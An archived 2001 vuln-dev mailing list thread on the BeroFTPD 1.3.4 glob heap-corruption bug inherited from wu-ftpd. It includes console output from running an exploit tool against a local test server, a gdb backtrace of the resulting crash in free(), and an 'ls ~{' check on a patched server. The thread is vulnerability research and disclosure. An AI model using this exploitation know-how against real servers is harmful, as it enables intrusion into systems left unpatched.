Vulnerability Development mailing list archives
Re: Older BeroFTPD glob
From: "Eduardo Cruz" <eduardo.cruz () tsg com>
Date: Mon, 10 Dec 2001 02:44:34 +0100
hi kf,

yes, by default of course it is. And past and future "standard" wuftpd bugs will affect beroftpd. For 1.3.4 just change the glob.c for the glob.c I attached on my last post. And don't forget that there are a few back-time wuftpd bugs that are present in bero.

have fun :)

----- Original Message -----
From: "KF" <dotslash () snosoft com>
To: <eduardo.cruz () tsg com>; <vuln-dev () security-focus com>
Sent: Friday, January 02, 1970 12:09 AM
Subject: re: Older BeroFTPD glob
In Eduardo's reply I did not find it clear whether BeroFTPD 1.3.4 was or was not vuln by default compile. I compiled it from the latest source on the wu-ftpd.org ftp server. Bare with no patches I get the following result... which was the same with earlier versions. Again I am on a ppc linux box:

[root@ibook root]# java wuwarez 42424242 0 localhost anonymous
Shellcode is 44 bytes long
return is 42424242
Got Socket
Sleeping so that you can attach a debugger
220 ibook FTP server (BeroFTPD 1.3.4(2) Mon Dec 1 23:09:32 EST 2003) ready.
Sending username
331 Guest login ok, send your complete e-mail address as password.
sending mal buffer as the passwd
ÿüÿþ;230 Guest login ok, access restrictions apply.
Populate Heap...needs more work
(program exit)
[root@ibook root]#

(This is what we saw when we attached the debugger)

[root@ibook src]# ps -ef | grep ftpd
ftp 2035 790 0 14:55 ? 00:00:00 ftpd: localhost.localdomain: anonymous
[root@ibook src]# gdb ./ftpd 2035
Program received signal SIGSEGV, Segmentation fault.
0xfeb6cfc in free () from /lib/libc.so.6
(gdb) bt
#0 0xfeb6cfc in free () from /lib/libc.so.6
#1 0x10010b58 in blkfree (av0=0x42424242) at glob.c:604
#2 0x1000dd04 in yyparse () at ftpcmd.y:1246
#3 0x10002cac in main (argc=268566528, argv=0x7ffffc74, envp=0x1003e828) at ftpd.c:1221
#4 0xfe5e308 in __libc_start_main () from /lib/libc.so.6
Detaching from program: /root/BeroFTPD-1.3.4/src/./ftpd, Pid 2035

-KF

From: "Eduardo Cruz" <eduardo.cruz () tsg com>
Date: Sun Dec 09, 2001 05:00:10 AM US/Pacific
To: "KF" <dotslash () snosoft com>, <vuln-dev () security-focus com>
Subject: Re: Older BeroFTPD glob

Connected to localhost.
220 cimitarra FTP server (BeroFTPD 1.3.4(1) Wed May 30 18:22:32 CEST 2001) ready.
Name (localhost:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user! This is an experimental FTP server. If have any
230-unusual problems, please report them via e-mail to root@cimitarra
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ~{
200 PORT command successful.
550 Missing }
ftp>

Just patch glob.c yourself, or use mine, already patched (attached). And about the maintenance of beroftp, as far as I know it has not been done for years. Anyway, apart from the bugs deriving from wuftpd I don't see the point in maintaining bero, I find it quite perfect like it is.

have fun